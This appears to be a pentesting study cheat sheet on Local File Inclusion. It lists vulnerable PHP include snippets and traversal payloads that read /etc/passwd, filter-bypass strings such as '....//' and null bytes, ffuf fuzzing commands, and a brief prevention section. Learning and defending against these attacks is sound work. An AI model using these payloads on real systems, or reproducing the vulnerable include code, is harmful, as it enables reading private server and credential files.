LFI

Function

Read Content

Execute

Remote URL

PHP

include()/include_once()

✅

require()/require_once()

✅

❌

file_get_contents()

✅

❌

✅

fopen()/file()

✅

❌

NodeJS

fs.readFile()

✅

❌

fs.sendFile()

✅

❌

res.render()

✅

❌

Java

include

✅

❌

import

✅

.NET

@Html.Partial()

✅

❌

@Html.RemotePartial()

✅

❌

✅

Response.WriteFile()

✅

❌

include

✅

Local File Inclusion

Basic LFI

include($_GET['language']);

?language=/etc/passwd

Path Traversal

include("./languages/" . $_GET['language']);

?language=../../../etc/passwd

Filename Prefix

include("lang_" . $_GET['language']);

?language=/../../../etc/passwd

Note: This may not always work, as in this example a directory named lang_/ may not exist, so our relative path may not be correct.

Appended Extensions

include($_GET['language'] . ".php");

Path Truncation

4096 chars

?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

Null bytes

/etc/passwd%00

Second order Attacks

/profile/$username/avatar.png -> ../../../etc/passwd

Basic Bypasses

Non-recursive Path Traversal Filters

$language = str_replace('../', '', $_GET['language']);

....// or ..././ or ..../ or ....////

Encoding

%2e%2e%2f

Approved Paths

if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {
    include($_GET['language']);
} else {
    echo 'Illegal path specified!';
}

./languages/../../../../etc/passwd

Automated Scanning

Fuzzing GET parameters

$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

Using Wordlist

$ ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

Fuzzing Server Files

Server Web Root

Server Logs/Configs

LFI Tools

Prevention

File Inclusion Prevention

case-match (whitelisting)

Preventing Directory Traversal

while(substr_count($input, '../', 0)) {
    $input = str_replace('../', '', $input);
};

Web Server Configuration

allow_url_fopen and allow_url_include to Off.

use Docker or open_basedir = /var/www in php.ini

Disable PHP Expect and mod_userdir

WAF

PreviousXSS NextPHP Filters

Last updated 2 years ago

hashtagLocal File Inclusion

hashtagBasic LFI

hashtagPath Traversal

hashtagFilename Prefix

hashtagAppended Extensions

hashtagPath Truncation

hashtagNull bytes

hashtagSecond order Attacks

hashtagBasic Bypasses

hashtagNon-recursive Path Traversal Filters

hashtagEncoding

hashtagApproved Paths

hashtagAutomated Scanning

hashtagFuzzing GET parameters

hashtagUsing Wordlist

hashtagFuzzing Server Files

hashtagServer Web Root

hashtagServer Logs/Configs

hashtagLFI Tools

hashtagPrevention

hashtagFile Inclusion Prevention

hashtagPreventing Directory Traversal

hashtagWeb Server Configuration

hashtagWAF